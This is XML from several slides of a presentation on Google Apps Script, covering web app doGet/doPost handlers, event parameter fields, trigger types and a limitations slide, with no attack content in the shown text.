          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>doGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(e): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>called when an HTTP GET request is sent to the endpoint defined by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>doPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(e): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>called when an HTTP POST request is sent to the endpoint defined by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> argument represents an event parameter that can contain information about any request parameters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>e.queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>query string of the URL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0"/>
              <a:t>?user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0" err="1"/>
              <a:t>grehack&amp;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0"/>
              <a:t>=1337&amp;i=31337</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>e.parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>an object of key/value pairs that correspond to the request parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>({“user": “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>grehack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>", “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>": “1337"})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>e.parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>e.parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> but with an array of values for each key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>({“user": [“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>grehack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>“], “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>": [“1337“, “31337”]})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>e.pathInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>the URL path after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>/exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>e.contentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>the length of the request body for POST requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>e.postData.contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>content text of the POST body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{588E1C11-30F2-3928-00B5-5224B42ABF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>15/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1295111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Triggers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3CA2C7-2305-D825-41A9-DC84F3CBC5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="8407974" cy="3509849"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Triggers are functions that are automatically executed in response to specific events or triggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Triggers are useful for automating tasks and simplifying repetitive processes, which can save time and improve productivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Some common triggers include time triggers, form triggers, change triggers, and email triggers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Time triggers: define functions to run at specific times or regular intervals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Form triggers: execute a function in response to a Google Sheets, Google Forms, or Google Slides form submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Change triggers: automatically runs whenever a specific cell is modified in a Google Sheets spreadsheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Email triggers: automatically send emails in response to specific events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCFBBBBC-8458-ABC8-CAF8-C9A17B8CFEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>16/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1816737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Limitations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65D9684-D1F1-D0B0-7E23-D93BE0AC6C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="7164825" cy="349149"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> limitations:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0926046-8D4A-C1E1-6010-13666A1E7AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="227953" y="1611802"/>
            <a:ext cx="3918098" cy="3430874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F1DAF0-887F-6F4E-F73E-756300DC37A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4462448" y="1611802"/>
            <a:ext cx="4062704" cy="3401456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A158078-883A-267D-7DD6-C55597482331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>17/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3084642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2" y="100824"/>
            <a:ext cx="5841953"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Google Workspace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>MarketPlace</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" dirty="0">
              <a:solidFill>
